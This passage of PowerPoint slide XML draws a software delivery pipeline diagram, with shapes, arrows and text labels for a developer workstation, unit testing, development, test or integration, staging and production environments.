                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851657" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2951505" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837306" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2980690" h="142875">
                  <a:moveTo>
                    <a:pt x="2837306" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837306" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837306" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2980690" h="142875">
                  <a:moveTo>
                    <a:pt x="2951505" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2851657" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851657" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2951708" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2980181" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2951505" y="5715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67967" y="2759964"/>
              <a:ext cx="3321050" cy="4962525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3321050" h="4962525">
                  <a:moveTo>
                    <a:pt x="3320796" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4962144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320796" y="4962144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332079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2237358" y="2817367"/>
            <a:ext cx="138366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61290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45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600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040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84273" y="2743200"/>
            <a:ext cx="12305030" cy="4963795"/>
            <a:chOff x="1684273" y="2743200"/>
            <a:chExt cx="12305030" cy="496379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32392" y="3607308"/>
              <a:ext cx="1272540" cy="122682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17780" y="3607308"/>
              <a:ext cx="1271016" cy="122682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735067" y="2743200"/>
              <a:ext cx="3321050" cy="4963795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3321050" h="4963795">
                  <a:moveTo>
                    <a:pt x="3320795" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320795" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320795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50052" y="3607308"/>
              <a:ext cx="1271016" cy="122682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25267" y="3476244"/>
              <a:ext cx="798576" cy="79857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6211" y="4386072"/>
              <a:ext cx="798576" cy="79857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81755" y="4337303"/>
              <a:ext cx="798576" cy="79857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023237" y="4322825"/>
              <a:ext cx="1860550" cy="1831975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1860550" h="1831975">
                  <a:moveTo>
                    <a:pt x="142875" y="1688973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85852" y="918972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57277" y="918972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="1831848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135699" y="1703324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="1688973"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1860550" h="1831975">
                  <a:moveTo>
                    <a:pt x="973582" y="924433"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="916419" y="924433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916305" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887730" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887844" y="924433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830707" y="924433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902081" y="1067308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966393" y="938784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973582" y="924433"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1860550" h="1831975">
                  <a:moveTo>
                    <a:pt x="1860423" y="1688973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1803273" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803400" y="918972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774825" y="918972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774698" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1717548" y="1688973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1789049" y="1831848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853247" y="1703324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860423" y="1688973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696973" y="6200394"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693419" h="855345">
                  <a:moveTo>
                    <a:pt x="577850" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577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696973" y="6200394"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693419" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577850" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963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809749" y="6389370"/>
              <a:ext cx="487045" cy="523240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487044" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="131063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487044" y="131063"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="391667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487044" y="391667"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="260603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487044" y="260603"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="522731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487044" y="522731"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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2055" y="6728459"/>
              <a:ext cx="492251" cy="46024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689097" y="5485638"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693420" h="855345">
                  <a:moveTo>
                    <a:pt x="577850" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577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689097" y="5485638"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693420" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577850" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85496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801873" y="5674614"/>
              <a:ext cx="487045" cy="523240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="487045" h="523239">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523239">
                  <a:moveTo>
                    <a:pt x="0" y="131063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="131063"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523239">
                  <a:moveTo>
                    <a:pt x="0" y="393192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="393192"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523239">
                  <a:moveTo>
                    <a:pt x="0" y="262128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="262128"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523239">
                  <a:moveTo>
                    <a:pt x="0" y="522731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="522731"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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64179" y="6013703"/>
              <a:ext cx="492252" cy="46024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617213" y="6200394"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693420" h="855345">
                  <a:moveTo>
                    <a:pt x="577850" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693420" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693420" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577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617213" y="6200394"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693420" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577850" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693420" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693420" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85496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729989" y="6389370"/>
              <a:ext cx="487045" cy="523240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="131063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="131063"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="391667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="391667"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="260603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="260603"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="522731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="522731"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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2295" y="6728459"/>
              <a:ext cx="492251" cy="460248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9505568" y="7327138"/>
            <a:ext cx="435927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228340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Staging	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Production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734939" y="5544058"/>
            <a:ext cx="125222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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85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600" spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing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694934" y="2817367"/>
            <a:ext cx="138366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61290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45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600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040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252598" y="7327138"/>
            <a:ext cx="51028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194050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" baseline="1736" sz="2400" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" baseline="1736" sz="2400" spc="-60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baseline="1736" sz="2400" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" baseline="1736" sz="2400" spc="-97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baseline="1736" sz="2400" spc="97" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:endParaRPr baseline="1736" sz="24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947921" y="6045961"/>
            <a:ext cx="9916160" cy="1001394"/>
            <a:chOff x="3947921" y="6045961"/>
            <a:chExt cx="9916160" cy="1001394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5851397" y="6159245"/>
              <a:ext cx="416559" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="416560" h="547370">
                  <a:moveTo>
                    <a:pt x="346710" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416051" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416051" y="69341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3467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5851397" y="6159245"/>
              <a:ext cx="416559" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="416560" h="547370">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="346710" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416051" y="69341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416051" y="547115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54711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5918453" y="6279641"/>
              <a:ext cx="292100" cy="335280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="83819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="83819"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="251459"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="251459"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="167639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="167639"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="335279"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="335279"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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15227" y="6496811"/>
              <a:ext cx="295655" cy="295656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6185153" y="6221729"/>
              <a:ext cx="414655" cy="548640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414654" h="548640">
                  <a:moveTo>
                    <a:pt x="345440" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="548640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="69088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454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6185153" y="6221729"/>
              <a:ext cx="414655" cy="548640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414654" h="548640">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="345440" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="69088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="548640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54864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6252209" y="6343649"/>
              <a:ext cx="292100" cy="335280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291591" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="83819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291591" y="83819"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="251460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291591" y="251460"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="167639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291591" y="167639"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="335280"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291591" y="335280"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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48983" y="6559295"/>
              <a:ext cx="294132" cy="295656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6462521" y="6264401"/>
              <a:ext cx="414655" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414654" h="547370">
                  <a:moveTo>
                    <a:pt x="345439" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="547116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="547116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="69087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454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6462521" y="6264401"/>
              <a:ext cx="414655" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414654" h="547370">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="345439" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="69087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414527" y="547116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54711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6529577" y="6384797"/>
              <a:ext cx="292100" cy="335280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="83819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="83819"/>
                  </a:lnTo>
                </a:path>
